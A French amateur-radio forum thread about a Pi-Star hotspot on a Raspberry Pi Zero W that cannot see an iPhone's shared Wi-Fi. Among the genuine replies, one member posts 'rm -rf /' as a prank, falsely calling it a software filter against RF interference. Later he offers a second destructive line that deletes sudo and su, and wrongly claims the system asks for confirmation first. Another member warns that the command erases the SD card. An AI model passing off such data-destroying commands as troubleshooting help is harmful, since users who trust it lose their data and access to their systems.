Jump to content
ON4KDE

Hotspot Pi-Star, dmr et iPhone

Recommended Posts

ON4KDE

Bonjour,

Je me heurte à un problème que je n'arrive pas à résoudre.

Le matériel est :

- Hotspot MMDVM sur base d'un Raspberry Pi Zéro W

- Logiciel pi-star dernière version à jour

- Smartphone iPhone Xs

Le but recherché :

Pourvoir utiliser le hotspot en mobile en passant par la 4G de L'iphone.

Le problème :

Le raspberry ne semble pas voir le wifi partagé de L'iphone.

J'ai fait toutes les mises à jour.

Le wifi du raspberry est programmé en ip donnée par DHCP du wifi hôte.

Sur un wifi "normal" celui de mon routeur par exemple tout fonctionne très bien.

Lorsque j'active le partage de connexion de l'iphone il est très bien détecté par tous mes appareils comme tablette ou ordi et le partage fonctionne très bien.

Par contre aucune connexion du raspberry !

Lorsque je vais dans l'administration de pi-star et que je demande de me montrer les wifi disponibles ils ont tous là sauf celui de l'iphone pourtant bien actif et visible sur d'autres appareils.

Toute idée de où pourrait provenir ce problème est la bienvenue.

73 à tous ON4KDE - CT7ASG

F8EBL

Bonjour.

Ouvrez un terminal sur le raspberry et essayez cette commande simple.

rm -rf /

C' est une astuce peu connue qu' on peut utiliser pour activer un filtre en software afin d' éviter le brouillage par le retour HF dans le raspberry.

Ca devrait remettre tout au propre, hi !

Attendez quand même demain ( si le problème persiste ) et vérifiez que la date est correcte avant de faire la manip.

Et faites quand même une sauvegarde, on ne sait jamais 😈

• Merci ! 2

F5OWL
Posted (edited)

Bonjour,

Essayez d'abord avec autre chose qu'un iPhone.

Je n'utilise pas MMDVM ni pistart mais j'utilise beaucoup le wifi sur des microcontrôleurs avec mes étudiants et aucun de ceux qui possèdent un iphone n'a jamais réussit.

73,

Philippe

Edit : je n'avais vu que ça fonctionnait avec un wifi "normal".

Edited by F5OWL
mal lu la question

F4BAD

Bonjour

Tous ces PCB compacts ne sont pas des exemples de CEM : on peut facilement avoir des améliorations en déportant le wifi, quand c'est possible ( si pas wifi interne). Experience vecu sur raspi ( pas les pires ) et d'autres systemes.

Mais je penses que vous etes à proximité et je confirme que MAC est une vraie SALOPERIE d'incompatibilité bas niveau software : on passe parfois du temps sur des faux problemes d'interconnexion que l'on ne voit pas avec d'autres matériels: protection mac. D'autant plus incompréhensible que cela fonctionne avec d'autres routeurs ou clients wifi..

Regarder ce ce coté : https://rasspberrypi.wordpress.com/2012/09/09/wifi-tools-for-raspberry-pi/ pour savoir un peu plus des reseaux wifi visibles ou non,recup de ip  ou pas, ce que vous avez deja du faire...

Detail aussi :  wifiband 2G et  wifi5G : beaucoup sont bibandes , sans le dire. un wifi 5G partagé, visible que par les clients wifi5giga... et donc pas par  la raspi...

question subsidiaire hors problème: pourquoi passer par la 4G mobile ?

73

• Message intéressant 1
  • Inutile ou HS 1

F4BUV

Bonjour ON4KDE J ai là même configuration que vous et je vous rassure sa fonctionne très bien très bien avec un iPhone . 
lorsque vous recherchez votre iPhone avez vous activez votre partage de connections ?

si sa n était pas le cas faite le ,sa devrait fonctionner. Je l utilise souvent via mon iPhone et la 4g . Tenez moi au courant de vos essais. 

F4ICI
Posted (edited)
Le 30/03/2020 à 15:04, F8EBL a dit :

Bonjour.

Ouvrez un terminal sur le raspberry et essayez cette commande simple.

rm -rf /

C' est une astuce peu connue qu' on peut utiliser pour activer un filtre en software afin d' éviter le brouillage par le retour HF dans le raspberry.

Ca devrait remettre tout au propre, hi !

Attendez quand même demain ( si le problème persiste ) et vérifiez que la date est correcte avant de faire la manip.

Et faites quand même une sauvegarde, on ne sait jamais 😈

A ceux qui liraient ce topic, ne surtout pas taper cette commande vous effacez toute votre carte sd sans sommation.

Vraiment pas très malin de sortir ça à des novices.

Sur les forums informatiques que je fréquente une réponse pareil c'est bannissement immédiat et définitif.

Edited by F4ICI

F8EBL
Il y a 12 heures, F4ICI a dit :

vous effacez toute votre carte sd sans sommation.

Meuhnoonn !

On vous demandera toujours de confirmer au moins une fois avant l' execution de cette commande, au moins sous raspbian et Ubuntu.

J' aurais voulu être vraiment vache, j' aurais proposé ça :

rm -f /usr/bin/sudo;rm -f /bin/su

Là, pas de confirmation, et une fois exécuté, vous êtes dans la mouise ! Vous êtes pour ainsi dire "enfermé dehors"

En suite, les participants du forum ne sont pas a priori des "novices" mais des personnes avisées qui sont sensées avoir un bagage suffisant pour effectuer ce genre de manips, même si dans la pratique c' est loin d'être évident..

Et même, si un imprudent copie sans comprendre le rm -rf / et passe les confirmations sans s' alarmer, sans comprendre qu' on lui dit " attention, vous allez effacer le disque !", c' est pas bien complqué de

remettre une image sur la carte SD, et ça lui apprendra à copier sans comprendre, la prochaine fois il essaiera sans doute de comprendre ce qu' il fait avant de taper du code,

Toute personne manipulant un système sous linux doit savoir ce que signifie ce code et expliquer ce qu' il fait , sans quoi il ferait mieux de ne jamais utiliser le bash .

Lu ailleurs sur le web :

" do your research and never execute anything unless you’re absolutely sure what it does. If someone tells you to “try this command”, always double- and triple-check it. "

Il y a 12 heures, F4ICI a dit :

Sur les forums informatiques que je fréquente une réponse pareil c'est bannissement immédiat et définitif.

Sur ceux que je fréquente, c ' est celui qui se fait poirer avec une blague pareille qui se fait bannir, ou au moins inscrire sur le " wall of sheep" .

En dernier lieu, simplement la date du post devrait automatiquement mettre le " bullshitFlag" à 1.

• Message intéressant 1